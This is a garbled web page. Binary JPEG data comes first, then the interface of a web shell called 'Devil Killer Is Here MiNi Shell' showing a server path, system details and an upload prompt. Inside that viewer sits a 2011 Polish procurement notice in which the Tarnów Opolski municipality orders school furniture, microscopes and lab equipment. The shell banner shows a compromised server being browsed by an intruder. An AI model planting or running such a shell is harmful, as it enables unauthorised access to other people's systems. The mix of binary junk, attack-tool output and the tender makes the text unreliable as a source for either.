JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110516/115792-N-2011.html

<p class="kh_header"><b>Tarnów Opolski: Poprawa jakości edukacji w szkołach podstawowych i gimnazjalnych Gminy Tarnów Opolski poprzez zakup wyposażenia</b><br>
<b>Numer ogłoszenia: 115792 - 2011; data zamieszczenia: 16.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tarnów Opolski , ul. Dworcowa 6, 46-050 Tarnów Opolski, woj. opolskie, tel. 77 4644282, faks 77 4644282.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.tarnowopolski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Poprawa jakości edukacji w szkołach podstawowych i gimnazjalnych Gminy Tarnów Opolski poprzez zakup wyposażenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest zakup wraz z dostawą i montażem wyposażenia szkolnego meblowego, sprzętu i pomocy szkolnych zgodnych z załącznikiem nr 1 do formularza ofertowego o parametrach zgodnych lub lepszych od opisanych w załączniku nr 3,5 i 6 do SIWZ.

Zamówienie obejmuje między innymi zakup ławek, krzeseł mebli, pomocy szkolnych do zajęć przyrodniczych, chemicznych, fizycznych, matematycznych, programów multimedialnych oraz wyposażenie dwóch pracowni językowych zgodnie z opisem stanowiącym załącznik nr 3, 5 i 6 do SIWZ

2.Oferowany przez wykonawcę sprzęt musi być fabrycznie nowy.
3. Sprzęt i urządzenia muszą pochodzić z legalnego źródła, zakupione w autoryzowanym kanale sprzedaży producenta w Polsce i objęte standardowym pakietem usług gwarancyjnych zawartych w cenie urządzenia i świadczonych przez sieć serwisową producenta na terenie Polski.
4.Sprzęt objęty jest bezpłatnym serwisem gwarancyjnym obejmującym naprawę na miejscu instalacji lub wymianę ulegających awarii elementów. 
5. Wykonawca wraz ze sprzętem dostarcza listę numerów seryjnych  dostarczonych urządzeń w postaci arkusza gwarancyjnego zawierającego zobowiązania wynikające z umowy
6. Wszystkie pomoce i urządzenia wchodzące w skład przedmioty zamówienia musza posiadać certyfikaty i atesty, które należy dostarczyć zamawiającemu podczas dostawy sprzętu.
7. Na dostarczone wyposażenie i sprzęt stanowiące przedmiot zamówienia Zamawiający wymaga udzielenia minimum 24 miesięcznej gwarancji.
8. Przedmiot niniejszego zamówienia jest współfinansowany ze środków Unii Europejskiej - w ramach Regionalnego Programu Operacyjnego na lata 2007-2013 poddziałanie RPOP.05.01.02 Wsparcie lokalnej infrastruktury edukacyjnej.
 Zad. I. Miejsce dostawy i montażu - PSP w Kątach  Opolskich
1.stoliki na stołówkę 1600x800 mm -	12 szt
2.krzesła uczniowskie do klas typu Nysa OK1, Nr 6 lub podobne -36 szt
3.Mikroskop dla ucznia DELTA OPTICAL BIOSTAGE - oświetlenie diodowe i wbudowany akumulator umożliwiający pracę w terenie. W zestawie skrzynka drewniana * Dane techniczne: obrotowa głowica jednooczna * diafragma z płynną regulacją * obiektywy achromatyczne: 4x, 10x, 40x(S), 100x(S)(O) * okular: WF10x * zakres powiększeń 40 - 100x * śruba makrometryczna i mikrometryczna * stolik krzyżowy ruchomy * miska rewolwerowa czterogniazdowa * podświetlenie diodowe * wbudowany akumulator umożliwiający pracę w terenie * kondensor
Powiększenie w wyposażeniu standardowym od 40x do 1000x
Lub inny  o równoważnych lub lepszych parametrach - 6 szt
4.Mikroskop dla nauczyciela DELTA OPTICAL GENETIC powiększenie (40-1600x) lub inny o równoważnych lub lepszych parametrach - 1 szt
5.taboret elektryczny - standardowy -1 szt
6.model anatomiczny TORS człowieka - rozmiar naturalny na podstawie, model rozbierany na części - 23 częściowy - 1 szt
7.zestaw szkieł podstawowych 50 szt standardowy - 2szt
8.zestaw szkieł nakrywkowych 100 szt 15mm x 15mm standardowy	 -1 zest.
9.Lupa stojaca składana duża 110 mm - pow.X3 - 2 szt
10.Regał stalowy DM-P 3319 900x600x1800- 1szt
11.Stół do pracy DM - P-3100,  900x600 metalowy - 1 szt
12.Foligramy - przyroda Człowiek-zestaw 8 foligramów - anatomia człowieka	- 1 zest.
	
Zad. II. Miejsce dostawy i montażu - PSP w Nakle
1.Mikroskop dla ucznia DELTA OPTICAL BIOSTAGE - oświetlenie diodowe i wbudowany akumulator umożliwiający pracę w terenie. W zestawie skrzynka drewniana * Dane techniczne: obrotowa głowica jednooczna * diafragma z płynną regulacją * obiektywy achromatyczne: 4x, 10x, 40x(S), 100x(S)(O) * okular: WF10x * zakres powiększeń 40 - 100x * śruba makrometryczna i mikrometryczna * stolik krzyżowy ruchomy * miska rewolwerowa czterogniazdowa * podświetlenie diodowe * wbudowany akumulator umożliwiający pracę w terenie * kondensor
Powiększenie w wyposażeniu standardowym od 40x do 1000x
Lub inny  o równoważnych lub lepszych parametrach 	 - 15 szt.
2.Mikroskop dla nauczyciela DELTA OPTICAL GENETIC powiększenie (40-1600x) lub inny o równoważnych lub lepszych parametrach- 1 szt.
3.Szkiełka podstawowe i nakrywkowe  (5 zestawów)
Szkiełka podstawowe: 5x50 sztuk
Szkiełka nakrywkowe: 18mm x18mm, 5x100 sztuk-5 zest.
4.Preparaty do mikroskopów   ( 2 zestawy) 
Preparaty do mikroskopów  - w pudełkach segregacyjnych 
Kategorie: szarańcza, skrobia, napoje, tworzywa sztuczne, leki, włókna sztuczne, włókna naturalne, zwierzęta, grzyby, witaminy, algi, rośliny	- 2 zest.
5.Elektronika - zestaw do nauki  obwód prądu ( 2 zestawy)
Skład zestawu: Elementy z kołeczkami do wciskania w płytę główną.
- 2 podstawy do lamp z żaróweczkami
- 2 przełączniki
- 1 silnik elektryczny
- 4 elementy rozgałęzienia
- 2 podstawy na baterie paluszki
- 2 baterie paluszki
- 10 przewodów łączących z wsadami
- 1 płyta główna
- instrukcja	2 zest.
6.Pole magnetyczne - cylinder demonstracyjny (magnes sztabkowy, 7 cm,
pojemnik z tworzywa sztucznego z kawałkami żelaza, 10 cm)-1szt
7.Magnesy sztabkowe   (zestaw 2 magnesy) 7,5 x 1,4 x 0,9 xm	- 8 zest.
8. Urządzenie do wytwarzania  piorunów
(płyta główna, maszyna influencji elektrostatycznej, maszyna Wimshursta łącznie z instrukcją obsługi i propozycjami do wykorzystania na lekcji) -1szt.
9.Podstawa magnetyczna z igłą magnetyczną- 1szt
10.Układ słoneczny - model z planetami pokazujący jak planety obracają się wokół Słońca.- 1szt
11.Model Kosmograficzny ze sztucznego tworzywa - pokazujący obieg Ziemi i Księżyca wokół Słońca. Globus: fi100mm, fi150mm. Wymiary 480 x 320 mm.- 1 szt.
12.Globusy fizyczne     320 mm - 8 szt
13.Globusy polityczne    220 mm lub 320 mm- 8 szt
14.Globusy fizyczne    420 mm- 1szt
15.Globus polityczny   320mm lub 420 mm- 1 szt
16.Duży model oka na podstawie wielkość ok. 50 cm model rozbierany na 6 części -1szt
17.Model ucha na podstawie wielkość ok. 50 cm model rozbierany na 6 części -1 szt
18.Globus do opisywania - biały model globusa politycznego z pisakami do malowania.-1 szt
19.Język - eksponat, model min. wymiar 15 cm	- 1 szt
20.Lupa stojaca składana duża 110 mm - pow.X3- 1 szt
21.Zestaw botanika nierdzewny
- pęseta
- nożyczki
- skalpel
- szpatułka
- pipeta ze sztucznego tworzywa
- igła z uchwytami
- pałeczka z tworzywa sztucznego
+ barwnik niebieski 25 mm 1 sztuka
   barwnik czerwony 25 mm 1 sztuka	 - 10 zest.
22.Igła magnetyczna na podstawie	- 10 szt.
23.Duplikx  20 - przyrząd do liczenia przestrzeni liczbowej do 20.-10 szt
24.Tablica 100 z polami - wielkość 60 x 60 cm, z 100 magnesami liczbowymi.- 1szt
25.Liczydło demonstracyjne   przestrzeń liczbowa 100, 72 x 50 cm, kulki fi3,3 cm, z wyjmowanymi drążkami, do wieszania na tablicy.- 1 szt
26.Figury geometryczne na magnesie  w czterech kształtach, kolorach i wielkościach (zestaw)	- 1 zest.
27.Kostki matematyczne - do obliczania, liczenia i budowania, mierzenia, ważenia - 4 kolory po 100 sztuk	- 4 zest.
28.Kompas kartograficzny - koło podziałowe o średnicy 55 mm  - 10 szt
29.regał  800x700x350 w kolorze buk	- 1 szt
30.Szafka  800x700x350 w kolorze buk	 - 1 szt
31.Regał z szufladami 1150x700x350 w kolorze buk - 1 szt
32.Szafka z witryną 1500x700x350 w kolorze buk - 1 szt
33.Biurko dla nauczyciela 1600x1000x760 w kolorze buk wyposażone w dwie szafki boczne - 1 szt
34.Kontener 400 x600x760 w kolorze buk- 1 szt
35.Szafa dwudrzwiowa 185x700x350 w kolorze buk - 1 szt
36.Ławki dwuosobowe 1300x500 w kolorze buk typu nysa lub podobne - 11szt
37.krzesła uczniowskie do klas typu Nysa OK1, Nr 6 lub podobne- 22 szt
38.Szafa 4-ro drzwiowa 185x1400x350 w kolorze buk- 1 szt
39.Liczydło demonstracyjne   2R20	 - 1szt

Zad. III. Miejsce dostawy i montażu - PSP w Tarnowie Opolskim
1.Stoły REGULAR (z regulowaną wysokością, 2 osobowe)
Stoły Regular dwuosobowe- regulowana wysokość 59-64 cm, blat 130x50 cm, kolor czerwony, niebieski lub zielony, blat z me laminowanej płyty wiórowej o grubości 18 mm z obrzeżem PCW o grubości 2cm.- 30 szt.
2.krzesła uczniowskie do klas typu Nysa OK1, Nr 6 lub podobne kolor dopasowany do ławek  stelaże regulowane.- 60 szt.
3.Stolik TWIN pod projektor i notebooka
- z dwiema niezależnymi półkami na projektor i komputer. Półki regulowane w pionie, dodatkowo obracające się o 360 stopni. Max. wysokość 120 cm, obciążenie półek 10 kg każda. Podstawa na 4 kółkach. Kolor buk lub olcha. -3 szt
4.Tablica obrotowa (dwustronna białą) wielkość 100x150 cm lub 100x170 cm - 1 szt
5.Biurko dla nauczyciela - w klasie wys 75 cm gł. 75 cm - szer. 150 cm, kolor buk , olcha lub podobny, z jednej strony szafka z drugiej półki - 3 szt
6.Liczydła demonstracyjne od 1 - 20 długość 81 cm	-3 szt
7.Liczydła demonstracyjne od 1 - 100 długość 145 cm	- 3 szt.
8.Zestaw klasowy - tarcze zegarowe 1x demonstracyjne , 24 ćwiczeniowe, trwałe tarcze z wbudowanym systemem kół zębatych, demonstracyjna tarcza o średnicy 34,3 cm  lub większej, 24 tarcze ćwiczeniowe o średnicy 10,2 cm.-3 zestawy
9.Multimedialny pakiet przedmiotowy matematyka IV-VI- 1szt
10.Multimedialny pakiet przedmiotowy język polski klasy 4-6.-1szt
11.Multimedialny pakiet : Czytam i piszę - język polski 8-10 lat.-1 szt
12.Multimedialny pakiet Matematyka na wesoło- Niezwykłe wakacje  8-9 lat i Fabryka zabawek 7-8 lat- 1 szt
13.Multimedialny pakiet Matematyka na wesoło 10-11 lat	- 1szt
14.Socrates 103 fascynujące eksperymenty- 1szt
15.Język angielski plansze interaktywne Szkoła Podstawowa klasy 4-6 -1szt

Zad. IV. Miejsce dostawy i montażu - PG w Tarnowie Opolskim
1.Mikroskop dla ucznia DELTA OPTICAL BIOSTAGE - oświetlenie diodowe i wbudowany akumulator umożliwiający pracę w terenie. W zestawie skrzynka drewniana * Dane techniczne: obrotowa głowica jednooczna * diafragma z płynną regulacją * obiektywy achromatyczne: 4x, 10x, 40x(S), 100x(S)(O) * okular: WF10x * zakres powiększeń 40 - 100x * śruba makrometryczna i mikrometryczna * stolik krzyżowy ruchomy * miska rewolwerowa czterogniazdowa * podświetlenie diodowe * wbudowany akumulator umożliwiający pracę w terenie * kondensor
Powiększenie w wyposażeniu standardowym od 40x do 1000x
Lub inny  o równoważnych lub lepszych parametrach - 6 szt
2.Mikroskop dla nauczyciela DELTA OPTICAL GENETIC powiększenie (40-1600x) lub inny o równoważnych lub lepszych parametrach -1szt
3.lupa szkolna z rączką min. średnica od 3-4 cm	 - 20 szt
4.lornetka 7x50- 1szt
5.model anatomiczny TORS 50 -60cmczłowieka - rozmiar naturalny na podstawie, model rozbierany na części -	1szt
6.Duży model oka na podstawie wielkość ok. 50 cm model rozbierany na 6 części -	1szt
7.Model ucha na podstawie wielkość ok. 50 cm model rozbierany na 6 części-1 szt
8.szkielet człowieka naturalnej wielkości z widocznymi stawami i kośćmi krótkimi	- 1szt
9.zestaw tkanek roślinnych mikroskowy	-1 zest.
10.zestaw szkieł podstawowych 50 szt standardowy	-1 zest.
11.zestaw szkieł nakrywkowych 100 szt 15mm x 15mm standardowy-1  zest.
12.narzedzia preparacyjne zestaw standardowy -	1 zest.
13.preparaty mikroskopowe zestaw - tkanki kręgowców	-1 zest.
14.foliogramy ekologia (np.:ekosystemy, obieg pierwiastków w przyrodzie -1 zest.
15.foliogramy człowiek (np.. Anatomia)	-1 zest.
16.plansze zestaw I i II zwierzeta i rosliny chronione w Polsce w wersji utwardzonej	-1 zest.
17.szkielet ryba płoć lub inna ryba -	1
18.szkielet ssak np. kot lub królik-	1
19.szkielet gad np. wąż lub jaszczurka	 - 1
20.atlas anatomiczny człowieka  - A4 lub A5 - 	15szt
21.model blokowy liścia minimalne rozmiary 30cm x 40 cm-1szt
22.kamera mikroskopowa 640 x 480 pikseli-	1szt
23.szkietet płaz  -żaba -	1szt
24.biurko komputerowe dla nauczyciela - narożne 150x150x750 w kolorze buk- 1szt
25.stojak na plansze min. 1 m	- 1szt
26.Szafa dwudrzwiowa 160x800x600 w kolorze buk- 1szt
27.reagał zamkniety  w kolorze buk 120x800x350 - 1 szt
28.mikroskopy do kamery mikroskopowej - 1 szt
29.biurko lektora w kolorze buk	- 1 szt
30.krzesło obrotowe tapicerowane dla nauczyciela typu Quo Sideo Master w kolorze brąz lub inne o równoważnym wyglądzie i wytrzymałości	- 1szt
31.stanowisko 2 osobowe do pracowni językowej w kolorze buk -  ławki typu nysa lub podobne	 - 12 szt
32.krzesła uczniowskie do klas typu Nysa OK1, Nr 6 lub podobne	- 24 szt
33.pracownia mentor plus lub inna o rowanych lub lepszych parametrach zgodnie z za. Nr 5 do SIWZ	 - 1szt

Zad. V. Miejsce dostawy i montażu - PG w Przyworach

1.stół demonstracyjny dla nauczyciela, narożny, wykonany z płyty meblowej gr. 18 mm, blat gr. 28 mm pokryty laminatem HPL. Wyposażone w zlew 1-komorowy chemoodporny PP 350x350, baterię pojedynczą (podciągnięcie gniazda ściennego, by uniknąć prowadzenia kabli przy wodzie lub pod nogami). 
Wymiary 150na57 x 140na57 x 85 - 1szt
2. Biurko 2-szafkowe nauczyciela z nadstawką na laptopa, wykonane z płyty wiórowej laminowanej 
gr. 18 mm. Blat gr. 28 mm pokryty laminatem HPL. Wyposażony w gniazda 230V z wyłącznikiem 
i zasilacz prądu stałego i zmiennego  0-24V z wyświetlaczami LED. Kolor wiśnia
Wymiary: 180 x 70 x 80 	 - 1 szt
3.Stanowisko laboratoryjne przyścienne oparte na stelażu metalowym, pokryte blatem gr. 28 mm z laminatem HPL. Wyposażone w zlew 1-komorowy chemoodporny PP 350x350 oraz baterię pojedynczą. Pod stanowiskiem szafka maskująca zlew z instalacją. Wymiary: 230 x 70 x 85 -1szt
4.Wyciąg chemiczny (dygestorium) WCHS-NYSA PK, wyposażony w zlewik chemoodporny PP, baterię chemoodporną oraz zawór na gaz z butli (dostarczany z butlą) - podłącz pod przewód kominowy. Konstrukcja płytowa na stelażu metalowym. Kolor: stelaż - jasnoszary, płyta wiśnia). 
Wymiary : 126 x 71,5 x 216 cm  	 -1szt
5.Stolik uczniowski 3-os., blat gr. 28 mm pokryty laminatem HPL, stelaż metalowy malowany metodą proszkową, przykręcany do podłoża. Kolor: stelaż jasnoszary, płyta: wiśnia 
Wymiary: 180 x 57 x 76 	- 10szt
6.Krzesło uczniowskie typu Bolek Nr 6 - 12 szt. Nr 5-8 szt lub inne podobne	- 20 szt
7.Tablica Eno  (magnetyczna , ceramiczna ) - 160x120 cm78 cali-1szt
8.krzesło obrotowe tapicerowane dla nauczyciela typu Quo Sideo Master w kolorze czarnym lub inne o równoważnym wyglądzie i wytrzymałości	 - 1 szt
9.Szafa na pomoce i sprzęt, , wykonana z płyty gr. 18 mm w kolorze wiśnia,
Wymiary: 80 x 40 x 185 cm - 5 szt., 3 sztuki  dzielone w połowie zamykane, 1 szt- dół zamykany pełny, góra przeszklona, zamykana, 1sz-dzielona w połowie, dół zamykany, góra półki- 5 szt
10.Mikroskop dla nauczyciela DELTA OPTICAL GENETIC powiększenie (40-1600x) lub inny o równoważnym lub lepszych parametrach	 - 1szt
11.Mikroskop dla ucznia DELTA OPTICAL BIOSTAGE - oświetlenie diodowe i wbudowany akumulator umożliwiający pracę w terenie. W zestawie skrzynka drewniana * Dane techniczne: obrotowa głowica jednooczna * diafragma z płynną regulacją * obiektywy achromatyczne: 4x, 10x, 40x(S), 100x(S)(O) * okular: WF10x * zakres powiększeń 40 - 100x * śruba makrometryczna i mikrometryczna * stolik krzyżowy ruchomy * miska rewolwerowa czterogniazdowa * podświetlenie diodowe * wbudowany akumulator umożliwiający pracę w terenie * kondensor
Powiększenie w wyposażeniu standardowym od 40x do 1000x
Lub inny  o równoważnym lub lepszych parametrach	-10 szt
12.Pracownia językowa 20 stanowiskowa typu mentor lub inna o równoważnych lub lepszych parametrach zgodnie z zał. nr 5 do SIWZ -1szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.15.00.00-8, 39.14.33.10-2, 39.16.21.00-6, 39.12.10.00-6, 39.16.21.10-9, 39.16.00.00-1, 30.21.31.00-6, 32.34.21.00-3, 48.19.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 14.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
